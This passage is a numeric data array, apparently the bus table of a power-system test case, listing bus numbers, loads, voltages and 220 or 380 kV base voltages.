], [226, 1, 87.09673, 17.419346, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [227, 1, 108.504861, 21.700972, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [228, 1, 106.385702, 21.27714, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [229, 1, 235.413415, 47.082683, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [230, 1, 56.465581, 11.293116, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [231, 1, 0, 0, 0, 0, 0, 1.000798, 0, 380.0, 0, 1.1, 0.9 ], [232, 1, 0, 0, 0, 0, 0, 0.999972, 0, 380.0, 0, 1.1, 0.9 ], [233, 1, 0, 0, 0, 0, 0, 0.999753, 0, 380.0, 0, 1.1, 0.9 ], [234, 1, 201.136679, 40.227336, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [235, 1, 65.406967, 13.081393, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [236, 1, 0, 0, 0, 0, 0, 0.999977, 0, 380.0, 0, 1.1, 0.9 ], [237, 1, 0.541317, 0.108263, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [238, 1, 74.009173, 14.801835, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [239, 1, 102.252953, 20.450591, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [240, 1, 644.992017, 128.998403, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [241, 1, 477.271687, 95.454337, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [242, 1, 173.783258, 34.756652, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [243, 1, 140.208435, 28.041687, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [244, 1, 167.047935, 33.409587, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [245, 1, 0, 0, 0, 0, 0, 1.001539, 0, 380.0, 0, 1.1, 0.9 ], [246, 1, 0, 0, 0, 0, 0, 1.000317, 0, 380.0, 0, 1.1, 0.9 ], [247, 1, 33.149719, 6.629944, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [248, 1, 0, 0, 0, 0, 0, 1.000002, 0, 380.0, 0, 1.1, 0.9 ], [249, 1, 0, 0, 0, 0, 0, 1.000002, 0, 380.0, 0, 1.1, 0.9 ], [250, 1, 0, 0, 0, 0, 0, 1.000004, 0, 380.0, 0, 1.1, 0.9 ], [251, 1, 82.270083, 16.454017, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [252, 1, 210.985127, 42.197025, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [253, 1, 92.630521, 18.526104, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [254, 1, 29.575388, 5.915078, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [255, 1, 145.449295, 29.089859, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [256, 1, 166.805033, 33.361007, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [257, 1, 80.503798, 16.10076, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [258, 1, 262.352157, 52.470431, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [259, 1, 0, 0, 0, 0, 0, 0.99938, 0, 380.0, 0, 1.1, 0.9 ], [260, 1, 163.277677, 32.655535, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [261, 1, 0, 0, 0, 0, 0, 1.001064, 0, 380.0, 0, 1.1, 0.9 ], [262, 1, 0, 0, 0, 0, 0, 1.001157, 0, 380.0, 0, 1.1, 0.9 ], [263, 1, 234.221614, 46.844323, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [264, 1, 303.212513, 60.642503, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [265, 1, 0, 0, 0, 0, 0, 1.000004, 0, 380.0, 0, 1.1, 0.9 ], [266, 1, 146.128233, 29.225647, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [267, 1, 184.82051, 36.964102, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [268, 1, 64.269923, 12.853985, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [269, 1, 51.611158, 10.322232, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [270, 1, 0, 0, 0, 0, 0, 1.000001, 0, 380.0, 0, 1.1, 0.9 ], [271, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [272, 1, 1.053058, 0.210612, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [273, 1, 144.006139, 28.801228, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [274, 1, 279.928963, 55.985793, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [275, 1, 52.40423, 10.480846, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [276, 1, 204.285011, 40.857002, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [277, 1, 0, 0, 0, 0, 0, 0.999084, 0, 380.0, 0, 1.1, 0.9 ], [278, 1, 159.477848, 31.89557, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [279, 1, 0, 0, 0, 0, 0, 0.99951, 0, 380.0, 0, 1.1, 0.9 ], [280, 1, 0, 0, 0, 0, 0, 0.999206, 0, 380.0, 0, 1.1, 0.9 ], [281, 1, 210.651138, 42.130228, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [282, 1, 297.893332, 59.578666, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [283, 1, 119.408583, 23.881717, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [284, 1, 181.14835, 36.22967, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [285, 1, 80.785809, 16.157162, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [286, 1, 169.314007, 33.862801, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [287, 1, 104.064108, 20.812822, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [288, 1, 66.93331, 13.386662, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [289, 1, 105.266684, 21.053337, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [290, 1, 0, 0, 0, 0, 0, 1.004444, 0, 380.0, 0, 1.1, 0.9 ], [291, 1, 69.274761, 13.854952, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [292, 1, 136.572017, 27.314403, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [293, 1, 120.366084, 24.073217, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [294, 1, 32.075742, 6.415148, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [295, 1, 67.113625, 13.422725, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [296, 1, 190.53574, 38.107148, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [297, 1, 200.2552, 40.05104, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [298, 1, 105.738726, 21.147745, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [299, 1, 102.407253, 20.481451, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [300, 1, 278.985087, 55.797017, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [301, 1, 0, 0, 0, 0, 0, 0.999382, 0, 380.0, 0, 1.1, 0.9 ], [302, 1, 235.010808, 47.002162, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [303, 1, 120.708367, 24.141673, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [304, 1, 103.652359, 20.730472, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [305, 1, 0, 0, 0, 0, 0, 0.999637, 0, 380.0, 0, 1.1, 0.9 ], [306, 1, 0, 0, 0, 0, 0, 1.00166, 0, 380.0, 0, 1.1, 0.9 ], [307, 1, 122.94133, 24.588266, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [308, 1, 151.57028, 30.314056, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [309, 1, 247.990293, 49.598059, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [310, 1, 0, 0, 0, 0, 0, 0.999933, 0, 380.0, 0, 1.1, 0.9 ], [311, 1, 210.645181, 42.129036, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [312, 1, 94.732999, 18.9466, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [313, 1, 0, 0, 0, 0, 0, 1.000531, 0, 380.0, 0, 1.1, 0.9 ], [314, 1, 293.42253, 58.684506, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [315, 1, 0, 0, 0, 0, 0, 1.001491, 0, 380.0, 0, 1.1, 0.9 ], [316, 1, 114.966762, 22.993352, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [317, 1, 154.798534, 30.959707, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [318, 1, 254.391137, 50.878227, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [319, 1, 9.113308, 1.822662, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [320, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [321, 1, 215.578803, 43.115761, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [322, 1, 27.444569, 5.488914, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [323, 1, 2.855374, 0.571075, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [324, 1, 504.761011, 100.952202, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [325, 1, 164.428075, 32.885615, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [326, 1, 13.331318, 2.666264, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [327, 1, 114.725093, 22.945019, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [328, 1, 195.509192, 39.101838, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [329, 1, 294.063253, 58.812651, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [330, 1, 0, 0, 0, 0, 0, 1.001875, 0, 380.0, 0, 1.1, 0.9 ], [331, 1, 23.347622, 4.669524, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [332, 1, 0, 0, 0, 0, 0, 0.999214, 0, 380.0, 0, 1.1, 0.9 ], [333, 1, 245.319649, 49.06393, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [334, 1, 0, 0, 0, 0, 0, 0.99978, 0, 380.0, 0, 1.1, 0.9 ], [335, 1, 250.36721, 50.073442, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [336, 1, 0, 0, 0, 0, 0, 0.998617, 0, 380.0, 0, 1.1, 0.9 ], [337, 1, 99.588735, 19.917747, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [338, 1, 270.297978, 54.059596, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [339, 1, 167.175561, 33.435112, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [340, 1, 141.343558, 28.268712, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [341, 1, 127.7774, 25.55548, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [342, 1, 221.651745, 44.330349, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [343, 1, 121.601379, 24.320276, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [344, 1, 304.883782, 60.976756, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [345, 1, 333.37841, 66.675682, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [346, 1, 330.959769, 66.191954, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [347, 1, 115.742376, 23.148475, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [348, 1, 302.558194, 60.511639, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [349, 1, 0, 0, 0, 0, 0, 1.001645, 0, 380.0, 0, 1.1, 0.9 ], [350, 1, 158.726444, 31.745289, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [351, 1, 0, 0, 0, 0, 0, 1.001546, 0, 380.0, 0, 1.1, 0.9 ], [352, 1, 1050.657046, 210.131409, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [353, 1, 3.158626, 0.631725, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [354, 1, 21.459432, 4.291886, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [355, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [356, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [357, 1, 0.053792, 0.010758, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [358, 1, 0, 0, 0, 0, 0, 1.001214, 0, 380.0, 0, 1.1, 0.9 ], [359, 1, 3.140726, 0.628145, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [360, 1, 0, 0, 0, 0, 0, 1.000683, 0, 380.0, 0, 1.1, 0.9 ], [361, 1, 80.384045, 16.076809, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [362, 1, 229.13613, 45.827226, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [363, 1, 337.362642, 67.472528, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [364, 1, 79.596071, 15.919214, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [365, 1, 71.4417, 14.28834, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [366, 1, 141.597221, 28.319444, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [367, 1, 68.442215, 13.688443, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [368, 1, 33.702072, 6.740414, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [369, 1, 27.694123, 5.538825, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [370, 1, 81.53229, 16.306458, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [371, 1, 410.234585, 82.046917, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [372, 1, 237.90093, 47.580186, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [373, 1, 160.53572, 32.107144, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [374, 1, 82.319999, 16.464, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [375, 1, 270.038179, 54.007636, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [376, 1, 296.181024, 59.236205, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [377, 1, 211.942566, 42.388513, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [378, 1, 211.534621, 42.306924, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [379, 1, 72.906923, 14.581385, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [380, 1, 0, 0, 0, 0, 0, 1.00159, 0, 380.0, 0, 1.1, 0.9 ], [381, 1, 243.805196, 48.761039, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [382, 1, 0, 0, 0, 0, 0, 1.000739, 0, 380.0, 0, 1.1, 0.9 ], [383, 1, 0, 0, 0, 0, 0, 0.999102, 0, 380.0, 0, 1.1, 0.9 ], [384, 1, 86.032798, 17.20656, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [385, 1, 108.590275, 21.718055, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [386, 1, 87.24903, 17.449806, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [387, 1, 177.686215, 35.537243, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [388, 1, 954.172373, 190.834475, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [389, 1, 0, 0, 0, 0, 0, 0.999917, 0, 380.0, 0, 1.1, 0.9 ], [390, 1, 78.783781, 15.756756, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [391, 1, 89.741445, 17.948289, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [392, 1, 172.212932, 34.442586, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [393, 1, 215.061732, 43.012346, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [394, 1, 77.351522, 15.470304, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [395, 1, 107.20443, 21.440886, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [396, 1, 75.931801, 15.18636, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [397, 1, 608.8894, 121.77788, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [398, 1, 263.723152, 52.74463, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [399, 1, 112.36527, 22.473054, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [400, 1, 59.866333, 11.973267, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [401, 1, 0, 0, 0, 0, 0, 1.000626, 0, 380.0, 0, 1.1, 0.9 ], [402, 1, 0, 0, 0, 0, 0, 1.000395, 0, 380.0, 0, 1.1, 0.9 ], [403, 1, 29.725027, 5.945005, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [404, 1, 104.723108, 20.944622, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [405, 1, 789.508705, 157.901741, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [406, 1, 59.818937, 11.963787, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [407, 1, 118.412896, 23.682579, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [408, 1, 342.38369, 68.476738, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [409, 1, 0, 0, 0, 0, 0, 0.999948, 0, 380.0, 0, 1.1, 0.9 ], [410, 1, 44.328383, 8.865677, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [411, 1, 41.914301, 8.38286, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [412, 1, 2.944021, 0.588804, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [413, 1, 146.970835, 29.394167, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [414, 1, 12.479414, 2.495883, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [415, 1, 0, 0, 0, 0, 0, 1.000294, 0, 380.0, 0, 1.1, 0.9 ], [416, 1, 177.719984, 35.543997, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [417, 1, 6.953844, 1.390769, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [418, 1, 144.913917, 28.982783, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [419, 1, 77.455459, 15.491092, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [420, 1, 77.981906, 15.596381, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [421, 1, 112.330948, 22.46619, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [422, 1, 82.297417, 16.459483, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [423, 1, 172.842762, 34.568552, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [424, 1, 12.461518, 2.492304, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [425, 1, 102.340504, 20.468101, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [426, 1, 8.479226, 1.695845, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [427, 1, 71.259552, 14.25191, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [428, 1, 31.950571, 6.390114, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [429, 1, 360.55462, 72.110924, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [430, 1, 192.055045, 38.411009, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [431, 1, 128.430158, 25.686032, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [432, 1, 150.126976, 30.025395, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [433, 1, 76.740908, 15.348182, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [434, 1, 39.939706, 7.987941, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [435, 1, 159.733681, 31.946736, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [436, 1, 85.279132, 17.055826, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [437, 1, 19.421427, 3.884285, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [438, 1, 52.121793, 10.424359, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [439, 1, 97.044042, 19.408808, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [440, 1, 82.012132, 16.402426, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [441, 1, 62.873287, 12.574657, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [442, 1, 83.202642, 16.640528, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [443, 1, 180.391161, 36.078232, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [444, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [445, 1, 81.967659, 16.393532, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [446, 1, 38.007668, 7.601534, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [447, 1, 72.260004, 14.452001, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [448, 1, 53.103765, 10.620753, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [449, 1, 267.767161, 53.553432, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [450, 1, 163.860725, 32.772145, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [451, 1, 70.018496, 14.003699, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [452, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [453, 1, 46.925977, 9.385195, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [454, 1, 32.738657, 6.547731, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [455, 1, 53.377625, 10.675525, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [456, 1, 53.377625, 10.675525, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [457, 1, 163.695791, 32.739158, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [458, 1, 155.695338, 31.139068, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [459, 1, 189.487019, 37.897404, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [460, 1, 249.024982, 49.804996, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [461, 1, 259.039981, 51.807996, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [462, 1, 79.241673, 15.848335, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [463, 1, 40.60393, 8.120786, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [464, 1, 40.65301, 8.130602, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [465, 1, 65.665723, 13.133145, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [466, 1, 53.312259, 10.662452, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [467, 1, 49.198388, 9.839678, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [468, 1, 80.66591, 16.133182, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [469, 1, 49.987048, 9.99741, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [470, 1, 127.297826, 25.459565, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [471, 1, 125.336189, 25.067238, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [472, 1, 43.838821, 8.767764, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [473, 1, 80.498528, 16.099706, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [474, 1, 41.576648, 8.31533, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [475, 1, 40.801178, 8.160236, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [476, 1, 46.112044, 9.222409, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [477, 1, 74.414865, 14.882973, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [478, 1, 93.478633, 18.695727, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [479, 1, 169.404044, 33.880809, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [480, 1, 74.252862, 14.850572, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [481, 1, 64.484622, 12.896924, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [482, 1, 73.219514, 14.643903, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [483, 1, 62.267831, 12.453566, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [484, 1, 48.81495, 9.76299, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [485, 1, 72.916617, 14.583323, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [486, 1, 670.797253, 134.159451, 0, 0, 0, 0.999535, 0, 220.0, 0, 1.1, 0.9 ], [487, 1, 169.976923, 33.995385, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [488, 1, 489.780471, 97.956094, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [489, 1, 128.908826, 25.781765, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [490, 1, 40.111619, 8.022324, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [491, 1, 55.153992, 11.030798, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [492, 1, 86.007709, 17.201542, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [493, 1, 110.853642, 22.170728, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [494, 1, 151.506518, 30.301304, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [495, 1, 119.262708, 23.852542, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [496, 1, 8.447576, 1.689515, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [497, 1, 1056.366812, 211.273362, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [498, 1, 49.542651, 9.90853, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [499, 1, 69.153424, 13.830685, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [500, 1, 37.860686, 7.572137, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [501, 1, 64.053753, 12.810751, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [502, 1, 252.806898, 50.56138, 0, 0, 0, 1.0, 0, 